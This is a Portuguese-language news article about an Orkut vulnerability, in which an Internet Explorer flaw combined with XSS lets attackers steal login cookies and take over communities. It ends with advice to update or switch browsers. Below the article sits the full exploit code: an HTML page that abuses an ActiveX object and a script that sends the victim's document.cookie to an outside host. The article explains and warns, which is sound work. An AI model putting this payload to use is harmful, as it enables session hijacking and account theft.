|  Quando
um programa tem muitas falhas divulgadas na Internet, ele
é considerado um programa malfeito? Nem sempre. É
tudo uma questão de foco. Existe muito mais gente
tentando descobrir falhas no Microsoft Outlook do que no
Incredimail. Por isso, mesmo que esse último tivesse
muito mais bugs do que o Outlook, muitos não serão
descobertos pois os esforços dos entendidos no assunto
vão se voltar para o programa mais conhecido. É
sempre assim que funciona. E o Orkut não é
exceção.
Mas o Orkut é um site, não um programa. Sim,
mas quando utilizado junto de outro programa pode trazer
conseqüências catastróficas. O site www.cocadaboa.com
noticiou a alguns dias em primeira mão que um de
seus leitores , chamado Vinícius, havia informado
que conseguiu fazer uma proeza no Orkut: roubar uma comunidade
alheia. Mas como isso foi possível? De forma bem
simples.
Devido a um dos freqüentes erros do navegador Internet
Explorer, combinado com o fraco e mal-feito sistema de cookies
do Orkut pode fazer com que um usuário ao visitar
uma página “maliciosamente preparada”
com um script, entregue a sua autenticação.
Explicando melhor: cookies são pequenos arquivos
de texto salvos no seu computador para que os sites lhe
reconheçam quando você se conectar novamente
a eles. Ali então está suas informações
de login. Se alguém pegar esse seu arquivo, pode
tomar a sua identidade na mesma hora. A falha que permite
isso é chamada de Cross Site Scripting (ou XSS).
É tão simples que em minutos você poderia
tomar a identidade de dezenas de usuários. A comunidade
“Hackearam o Orkut” postou um exemplo de código
de script que você poderia utilizar para roubar os
acessos. Confira (acesso ao Orkut é requerido):
http://www.orkut.com/CommMsgs.aspx?cmm=1059800&tid=5883879
(veja também no final)
Não só o Orkut está vulnerável.
De acordo com o Cocadaboa, sites como o Fotolog no qual
os cookies não expiram estão com um perigo
maior ainda. E provavelmente muitos outros por aí.
Como se proteger disso então?
Você têm duas opções:
- Atualizar o Internet Explorer (e torcer para que a atualização
corrija o problema,
além de você ter que se preocupar sempre em
ficar atualizando)
- Utilizar um outro navegador como FireFox ou Ópera.
Ambos são gratuitos e
podem ser baixados no site do Superdownloads (www.superdownloads.com.br)
Marcos Assuncao
Participe
do nosso Fórum
-------------------------
===================================================================
http://www.orkut.com/ScrapView.aspx?uid=13112463994963420369
===================================================================
ESSE É O LINK :
===================================================================
http://www.precisa-se.com.br/rir/noticias.asp?id=0234
===================================================================
CÓDIGO DA PAGINA :
===================================================================
<body onload="setTimeout('vipz.DOM.body.innerHTML=\'n\'');setTimeout('main()',500)">
<object id="vipz" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="0" height="0" align="middle">
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT src="temp.ass">
</SCRIPT>
CÓDIGO DE TEMP.ASS :
===================================================================
function shellscript()
{
window.name="poorchild";open("http://www.orkut.com/About.aspx","poorchild");
}
function main()
{vipz.DOM.Script.execScript(shellscript.toString());
vipz.DOM.Script.setTimeout("shellscript()");
//alert("Você nao tem acesso a este serviço.
Faça o cadastro e volte depois");
var myloc=vipz.DOM.location.href;setTimeout('vipz.DOM.Script.execScript
("window.location.href=\'http://www.interessa.com.br/page_error.php?codigo=\'
+ escape(document.cookie);")',2000);
} |
